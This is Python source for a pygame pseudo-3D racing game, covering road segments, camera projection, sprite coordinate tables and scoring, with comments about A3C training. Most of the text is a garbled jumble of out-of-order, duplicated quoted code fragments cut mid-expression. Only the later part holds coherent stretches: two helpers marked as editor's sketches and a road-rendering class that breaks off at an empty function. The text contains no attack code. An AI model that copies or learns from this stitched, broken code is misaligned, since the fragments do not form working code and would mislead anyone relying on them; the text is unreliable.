##x_i = 2 y_sprt =", "end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "self.player_di == 1: #self.player_x += self.player_x_dt self.player_x += self.speed /", "* 2 if sky.rect.left - sky.rect.width > 0: sky.rect.left -=", "trees.rect.width < 0: trees.rect.left += trees.rect.width * 2 if trees.rect.left", "9 if self.player_x < -1000: self.player_di = 1 elif self.player_di", "def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with", "- self.camera_z - self.position zc2 = zw2 - self.camera_z -", "util_ease_in(self, a, b, percent): return a + (b - a)", "+ dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) xp1 =", "self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is None: di =", "not segs: segs = self.segments segs_c = [] for seg", "[] x, y = 0.0, 0.0 tht = 0.0 rad_m", "'EASY': 2, 'MEDIUM': 4, 'HARD': 6 }, 'HILL': {'NONE': 0,", "RETURN : go to a new road TODO: * hill", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self,", "- obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2 #obj.scale(scale)", "for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116 - int(ys1)), #", "self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees", "#n = seg_n / 20 n = seg_n / random.randint(10,", "e_keys_up: if self.player_di != 1: self.player_di = 0 def update_world(self):", "sprt_x = obj.rect.left sprt_w = obj.rect.width car_x = self.player_x car_w", "mx): result -= mx while (result < 0): result +=", "FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main():", "y]) #print pnts return pnts def draw_segs(self, segs, rad): pnts", "#print 'scale <1>', scale pass else: try: obj.scale(scale) except: #print", "ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4,", "a) * ((-math.cos(percent * math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n,", "if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n)", "dx2 #+ dx1 ''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "else: self.speed -= self.speed_dt_na # if on the grass, slow", "xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2", "not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200", "#theta_i = math.pi /180.0 * 0.1 #theta_i = math.pi /180.0", "FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left", "/ 2.0 / self.seg_draw_n engi = math.pi / 2.0 /", "ys3 self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,", "self.player_seg = 
self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5", "= self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4 =", "self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self):", "tht -= tht_d rad_m = 20.0#10.0#50.0# cv_s = 0 cv_l", "self.pglc.K_SPACE: # hide / show road map self.rdmap_hide() elif k", "self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value, mn, mx): return max(mn,", "'#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555',", "self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass", "rad) #print pnts if len(pnts) <= 1: return #if len(pnts)", "sky.rect.width * 2 for hill in self.bg_hills: hill.rect.left += int(self.hill_speed", "220 }, 'STUMP': { 'x': 995, 'y': 330, 'w': 195,", "rad_m = 20.0#10.0#50.0# cv_s = 0 cv_l = 0.0 else:", "else: return self.check_key(events) def key_to_di(self, k): if k == self.pglc.K_UP:", "< 0: # self.score = 0 self.game_over = True self.game_score", "2 in e_keys_dn: self.player_go = 2 if 1 in e_keys_dn:", "* 4#2 rad1 = rad + self.road_w / 2 rad2", "# with looping result = start + increment while (result", "if curve == 0.0: if cv_s: tht_d = self.cv_to_engl(cv_l, rad)", "self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not segs_file:", "time.time() self.tm_last_once = self.tm_end - self.tm_start else: self.tm_start = 0.0", "**kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf,", "self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left", "self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left + hill.rect.width", "'BILLBOARD06': { 'x': 488, 'y': 555, 'w': 298, 'h': 190", "xc4 = xc4 - x_curve - dx_curve xcl1 = xc1", "0.5#1.0#0.1# else: if cv_s: cv_l += curve else: cv_s =", "# TODO: do at update #dpx1 = self.seg_len * math.tan(theta_i)", "self.tm_last_once = self.tm_end - self.tm_start else: self.tm_start = 0.0 #self.tm_end", "class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file,", "self.game_over = False self.game_score = 0.0 self.tm_start = 0.0 self.tm_end", "/ 2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2] #x_sprt", "yp return ys def rd_seg_init(self, a=500): for n in range(a):", "p_curve = self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve', p_curve", "- self.player_x - curve_d * i #xc2 = -self.road_w /", "return None def check_key(self, events): #print id(events) r_events = []", "ys2, xs4, ys4, xs3, ys3, seg['color']['road']) if 1:#i % 2", "hold = random.randint(10, 100) leave = random.randint(10, 100) self.add_road(enter, hold,", "self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width", "(car_x + car_w / 2) < sprt_x < (car_x +", "0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y]) for", "xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc, self.d, zc1) ys1", "1: return #if len(pnts) > 0: # pnts.append(pnts[0]) cpnts =", "yp ys = h / 2.0 - yp return 
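# --- Editor's sketch (not from the original source): how the IMG_POS_* tables
# --- are typically consumed. Each entry is a crop rectangle into one packed
# --- sheet; with plain pygame the lookup is a subsurface. Paths are assumptions.
def _demo_crop_sprite(key='PLAYER_STRAIGHT'):
    import pygame
    sheet = pygame.image.load('img_flatpath/images/sprites.png')
    p = IMG_POS_SPRITES[key]
    return sheet.subsurface(pygame.Rect(p['x'], p['y'], p['w'], p['h']))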
ys", "rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self):", "handle_event(self, events, *args, **kwargs): #print '>>> ', events if not", "- hill.rect.width > 0: hill.rect.left -= hill.rect.width * 2 for", "5, 'w': 385, 'h': 265 }, 'TREE1': { 'x': 625,", "'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'],", "#x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' # <1> zw1", "< 10: print '>>> ', i print 'curve', seg.get('curve', 0.0)", "self.player_x += p_dt def check_if_car_out_road(self): # decrease score when go", "#self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0, self.size[0] - 2, y]) #", "## self.xp = 0.0 self.yp = 0.0 self.xs = 0.0", "x_curve = 0 #print 'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z']", "FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width or height is too large", "si seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len", "trees.rect.left - trees.rect.width > 0: trees.rect.left -= trees.rect.width * 2", "a if a < -1.0: a = -1.0 elif a", "scale > 500: #print 'scale <1>', scale pass else: try:", "segs_c.append(seg_c) return segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s", "if self.tm_start == 0.0: self.tm_start = time.time() self.tm_end = self.tm_start", "x_curve = x_curve + dx_curve dx_curve = dx_curve + seg.get('curve',", "ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc2,", "if i < self.seg_draw_n / 4: theta1 = theta_i *", "#self.segments[2]['color'] = FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y']", "k == self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB: self.road_reset_keep_segs() elif", "}, 'CACTUS': { 'x': 929, 'y': 897, 'w': 235, 'h':", "self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456", "rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w / 2 - self.player_x xc2", "self.h = h self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d", "NOTE: only show one break return obj def handle_event(self, events,", "'x': 5, 'y': 495, 'w': 1280, 'h': 480 }, 'TREES':", "= segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self,", "yw start_y = self.seg_lasy_y() end_y = start_y + (int(yw) *", "elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events def", "= h self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d =", "@classmethod def create_by_img(cls, img): return cls(img) # for test #o", "elif k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif event.type ==", "self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y, self.size[0] - 2, y])", "(len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n = len(self.segments)", "200 / n * (n - i) self.c[3] = ca", "-= self.speed / 5 + 20 else: pass p_curve =", "230, 'y': 280, 'w': 320, 'h': 220 }, 'COLUMN': {", "leave, curve, yw start_y = self.seg_lasy_y() end_y = start_y +", "{ 'x': 995, 'y': 531, 'w': 80, 'h': 41 }", "k not in ['sprites']: seg_c[k] = v else: seg_c[k] =", "reflect the y- d = 116 pnts = [[x1, d-y1],", "897, 'w': 298, 'h': 
190 }, 'BILLBOARD07': { 'x': 313,", "a s = 1.0 if a < 0.0: s =", "xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3", "#'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,},", "[[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]", "def geo_prjc_scale(self, d, zc): if zc == 0.0: return 1.0", "+= self.speed if self.position > self.track_len: self.position -= self.track_len #", "xsl1 = self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2", "self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' # <1>", "{'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat':", "- self.player_x xc4 = (rad - xx4) - self.player_x xp1", "math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n, total): return (n %", "5, 'y': 5, 'w': 215, 'h': 540 }, 'BILLBOARD08': {", "% seg_n return i def rd_get_segs(self, whole=False): if whole: segs", "self.seg_len * 2: if self.tm_start == 0.0: self.tm_start = time.time()", "self.track_len = 0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h", "/ 2 - self.player_x xc4 = -self.road_w / 2 -", "'h': 220 }, 'STUMP': { 'x': 995, 'y': 330, 'w':", "yc2 = yc - yw2 #print yw1, yw2 xp1 =", "self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock, *args,", "x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale", "self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left =", "= 0 # <1> #for i, seg in enumerate(self.segments): #", "''' #if 1: #if i < self.seg_draw_n / 2: if", "num, num, 0, height/2.0) self.add_road(num, num, num, 0, 0) def", "(640 - self.car.rect.width) / 2 ##self.disp_add(self.car) # car disp add", "sky.rect.width * 2 if self.speed <= 0.0: return p_curve =", "obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj)", "/ 2 - self.player_x #xcl1 = xc1 - self.lane_w #xcl2", "SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def", "car_w / 2), sprt_at, (car_x + car_w / 2) #print", "self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1,", "v + (accel * dt) def util_increase(self, start, increment, mx):", "'h': 55 }, 'CAR02': { 'x': 1383, 'y': 825, 'w':", "< 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter", "spr.items(): if sk not in ['obj']: spr_n[sk] = sv else:", "self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len self.prog.progress(prg) spdc = self.road.speed", "zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1)", "cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self,", "FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def", "self.util_ease_out(start_y, end_y, (float(n)+enter)/total)) for n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, 
n/leave),", "def rd_seg_init(self, a=500): for n in range(a): self.rd_seg_add(0.0, 0.0) def", "'HIGH': 60 }, } FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'],", "= obj # for reset to delete all # NOTE:", "curve xc1 = xc1 - x_curve xc2 = xc2 -", "= FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def", "= math.pi /180.0 * 0.1 #theta_i = math.pi /180.0 *", "in segs: if not seg['sprites']: segs_c.append(seg) else: seg_c = {}", "[x3, d-y3], [x4, d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try:", "+= 19 if self.player_x > 1000: self.player_di = 3 #'''", "SptTmpi(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne):", "e_keys_up self.e_keys_dn = e_keys_dn return r_events def refresh__1(self, fps_clock, *args,", "'obj': None, # need to create at render ##'x_i': None,", "+ '_' + sprt obj = info.get('obj') ''' # TODO:", "self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x -= self.speed /", "152 }, 'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230,", "self.road_w / 2 - self.player_x xc2 = -self.road_w / 2", "self.d, zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1,", "* self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len def", "100 self.disp_add(self.sn1) ''' ''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top", "self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True)", "get_segs_pnts_1(self, segs, rad): pnts = [] x, y = 0.0,", "6 }, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH':", "self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3,", "xp def yc_to_yp(self, yc, d, zc): if zc == 0.0:", "(accel * dt) def util_increase(self, start, increment, mx): # with", "'h': 190 }, 'BILLBOARD07': { 'x': 313, 'y': 897, 'w':", "% 4 == 0: c = FP_COLORS['LIGHT'] #c = {'road':", "{ 'HILLS': { 'x': 5, 'y': 5, 'w': 1280, 'h':", "{'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart':", "} FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1':", "[[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]", "self.fog.rect.top = 240 self.fog.rect.left = 0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None):", "spr in seg['sprites']: spr_n = {} for sk, sv in", "xs2, ys2 print xs4, ys4, xs3, ys3 print '-' *", "self.player_x xcr3 = self.lane_w - self.player_x xcr4 = -self.lane_w -", "range(n): j = random.randint(10, seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys())", "curve = 0.0 yw = 0.0 #elif p < 0.8:", "1#self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left += sky.rect.width", "0.9 #theta_i = 0.0 #xc1 = self.road_w / 2 -", "> self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self,", "circle\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i = math.pi", "2 if sky.rect.left - sky.rect.width > 0: sky.rect.left -= sky.rect.width", "-1100 #print 'sprt_x', sprt_x #print 'car_x', car_x #print 'car_w', car_w", "self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1,", "seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve 
test 2: draw a circle\"\"\" #theta_i", "yc * (d / zc) return yp def xp_to_xs(self, xp,", "self.camera_z - (self.position % self.seg_len) zc2 = zw2 - self.camera_z", "#print '=' * 80 #print 'self.position', self.position for i, seg", "d, zc): if zc == 0.0: return 1.0 else: return", "self.speed / 5 + 20 else: pass p_curve = self.player_seg.get('curve',", "#xp = float('inf') #xp = 2 ** 64 xp =", "#if n % 4 == 0: c = FP_COLORS['LIGHT'] #c", "0, -height) self.add_road(num, num, num, 0, height) self.add_road(num, num, num,", "= self.road_w / 2 - self.player_x #xc2 = -self.road_w /", "y3], [x4, y4], [x1, y1]] #pnts = [[x1, y1-d], [x2,", "'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y',", "**kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg()", "we should use the segment just under the car #sprts", "['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs':", "def __init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg = cfg", "obj = sprt.get('obj') if not obj: # None or 0", "'y': 5, 'w': 360, 'h': 360 }, 'DEAD_TREE1': { 'x':", "def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left =", "FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos)", "self.car.rect.width) / 2 ##self.disp_add(self.car) # car disp add after road", "self.position += 10.0#5.0#1.0 self.position += random.randint(2, 10) if self.position >", "xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i =", "25, 'MEDIUM': 50, 'LONG': 100 }, # num segments 'CURVE':", "= int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n", "x from x_pos 'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), }", "self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file =", "1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0 self.score = 0", "int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments) i = (i +", "(self.size[0] / 2, self.size[1] / 2), self.size[0] / 2, 0)", "xc1 = self.road_w / 2 - self.player_x xc2 = -self.road_w", "self.camera_h #print '=' * 80 #print 'self.position', self.position # <2>", "ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf,", "[x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]] c =", "* math.tan(theta2) xs1 += dx1 xs2 += dx1 xs3 +=", "= len(self.segments) #print n if n % 2 == 0:", "{ 'x': 488, 'y': 555, 'w': 298, 'h': 190 },", "= self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve * b_percent) x_curve", "5, 'y': 985, 'w': 1280, 'h': 480 }, } IMG_POS_SPRITES", "ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i", "3 #''' #''' self.position += 10.0#5.0#1.0 self.position += random.randint(2, 10)", "segs: segs = self.segments segs_c = [] for seg in", "p_dt = self.speed * p_curve * self.centrifugal #print p_dt #self.player_x", "in enumerate(self.segments): # <2> for i in range(self.seg_draw_n): #''' #", "{ 'x': 929, 'y': 897, 'w': 235, 'h': 118 },", "self.d, zc1) 
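# --- Editor's sketch (assumption, not original code): the road-map math above
# --- without pygame. Each segment advances a cursor one step along heading
# --- tht; a non-zero 'curve' bends the heading via asin(), as in get_segs_pnts().
def _demo_map_points(seg_len=200.0):
    pnts, x, y, tht = [[0.0, 0.0]], 0.0, 0.0, 0.0
    segs = [{'curve': 0.0}] * 10 + [{'curve': 2.0}] * 10  # straight, then a bend
    for seg in segs:
        curve = seg.get('curve', 0.0)
        if curve != 0.0:
            a = max(-1.0, min(1.0, 10.0 * curve / seg_len))
            tht += math.asin(a)
        x += math.cos(tht)
        y += math.sin(tht)
        pnts.append([x, y])
    return pnts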
class FPSptRoadB(sptdraw.SptDrawBase):
    def __init__(self, size, cfg, *args, **kwargs):
        super(FPSptRoadB, self).__init__(size)
        self.cfg = cfg
        self.car = kwargs.get('car')
        self.bg_sky = kwargs.get('bg_sky')
        self.bg_hills = kwargs.get('bg_hills')
        self.bg_trees = kwargs.get('bg_trees')
        self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])
        self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
        self.rd_reset(init=True)
        self.add_fog()

    def prms_reset(self, keep_segs=False):
        self.e_keys_up = []
        self.e_keys_dn = []
        self.flag_check_event = True

        ## world / camera coordinates
        self.camera_x = 0.0
        self.camera_y = 0.0
        self.camera_z = 500.0#1000.0#0.0 == self.camera_h
        self.xw = 0.0
        self.xc = 0.0
        self.yc = 0.0
        self.zc = 0.0
        ## projection / screen coordinates
        self.xp = 0.0
        self.yp = 0.0
        self.xs = 0.0
        self.d = 200.0#100.0#10.0#30.0#1.0
        self.w = self.size[0]
        self.h = self.size[1]

        if not keep_segs:
            self.segments = []
        self.rd_sprt_objs = {}
        self.rd_sprt_cache = []  # for sprites render order
        self.track_len = 0.0
        self.seg_len = 200.0#100.0#20.0#60.0#200.0#
        self.road_w = 2400#2000#600.0#200.0#1000.0#200#
        self.camera_h = 500.0#1000.0#
        self.speed_max = 300.0#180.0#200.0#100.0
        self.lane_w = 40.0
        self.seg_n = 300#200
        #self.seg_draw_n = 200#150
        self.seg_draw_n = 70#100#200#150
        self.speed = 0.0
        self.position = 0.0
        self.player_x = 0.0#100.0#1000.0#
        self.centrifugal = 0.1#0.06#0.08#0.01#0.3
        self.player_seg = None
        self.base_seg = None  # the segment just under the car
        self.player_di = 0  # 0:^ 1:> 2:v 3:<
        self.player_go = 0  # 0:- 1:^ 2:v
        self.speed_dt_up = 1.0#2.0#3.0
        self.speed_dt_dn = 2.0#4.0#6.0
        self.speed_dt_na = 1.0#3.0
        self.player_x_dt = 60.0#30.0#20.0
        self.last_seg_i = 0
        self.score = 0
        self.game_over = False
        self.game_score = 0.0
        self.tm_start = 0.0
        self.tm_end = 0.0
        self.tm_last_once = 0.0
        self.sky_speed = 0.05
        self.hill_speed = 0.1
        self.tree_speed = 0.3#0.15#

    def rd_reset(self, init=False, keep_segs=False, segs_file=None):
        #if not init and not keep_segs:
        if not init:
            self.rd_sprts_del_all_objs()
        self.prms_reset(keep_segs=keep_segs)
        if segs_file is not None:
            self.segments = self.rd_seg_json_load(segs_file)
            self.track_len = len(self.segments) * self.seg_len
        else:
            if not keep_segs:
                self.init_rd_segs_rand_1()
        self.draw_on()
        self.rd_seg_render()

    def init_rd_segs_rand_1(self):
        #self.rd_seg_init(self.seg_n)
        #self.rd_seg_init(self.seg_draw_n)
        #self.rd_seg_init(100)#20#500#2#10#4#1#100#200
        #self.rd_seg_init(random.randint(30, 100))
        self.rd_seg_init(random.randint(1, 10))  # for a3c train
        segnrand = random.randint(2, 6)  # for a3c train
        self.rd_seg_init_rand(segnrand)
        # for draw
        #self.rd_seg_init(self.seg_draw_n)
        self.rd_seg_init(10)  # for a3c train
        self.rd_start_seg_init()
        self.rd_sprts_init_rand()

    def draw_on(self, *args, **kwargs):
        self.fill(self.clr_dark_grass)

    def add_fog(self):
        self.fog = FPSptFog(self.size)
        self.fog.rect.top = 240
        self.fog.rect.left = 0
        self.disp_add(self.fog)

    def get_seg_base_i(self, pos=None):
        if pos is None:
            pos = self.position
        i = int(pos / self.seg_len)
        #x#i = int(utils.math_round(pos / self.seg_len))
        #i = int(math.floor(pos / self.seg_len))
        #i = int(math.ceil(pos / self.seg_len))
        seg_n = len(self.segments)
        i = (i + seg_n) % seg_n
        return i

    def rd_get_segs(self, whole=False):
        if whole:
            segs = self.segments
        else:
            segs = self.segments[:self.seg_draw_n]
        return segs

    #### geometry: camera -> projection -> screen
    def geo_prjc_scale(self, d, zc):
        if zc == 0.0:
            return 1.0
        else:
            return d / zc

    def xc_to_xp(self, xc, d, zc):
        if zc == 0.0:
            #xp = float('inf')
            #xp = 2 ** 64
            xp = xc
        else:
            xp = xc * (d / zc)
        return xp

    def yc_to_yp(self, yc, d, zc):
        if zc == 0.0:
            yp = yc
        else:
            yp = yc * (d / zc)
        return yp

    def xp_to_xs(self, xp, w):
        #xs = w / 2.0 + w / 2.0 * xp
        xs = w / 2.0 + xp
        return xs

    def yp_to_ys(self, yp, h):
        #ys = h / 2.0 - h / 2.0 * yp
        ys = h / 2.0 - yp
        return ys

    def rd_seg_init(self, a=500):
        for n in range(a):
            self.rd_seg_add(0.0, 0.0)

    def rd_seg_add(self, curve=0.0, yw=0.0):
        #print '+', curve, yw
        n = len(self.segments)
        #print n
        if n % 2 == 0:
        #if n % 4 == 0:
            c = FP_COLORS['LIGHT']
            #c = {'road': FP_COLOR_WHITE}
        else:
            c = FP_COLORS['DARK']
        seg = {
            'index': n,
            'p1': {'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()},
                   'screen': {}},
            'p2': {'world': {'z': (n + 2) * self.seg_len, 'y': yw},
                   'screen': {}},
            'curve': curve,
            'color': c,
            'sprites': [],
            'looped': 0,
        }
        self.segments.append(seg)
        self.track_len = len(self.segments) * self.seg_len
        #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len

    def seg_lasy_y(self):
        seg_n = len(self.segments)
        if seg_n == 0:
            return 0.0
        else:
            return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)

    def rd_seg_init_rand(self, n=50):
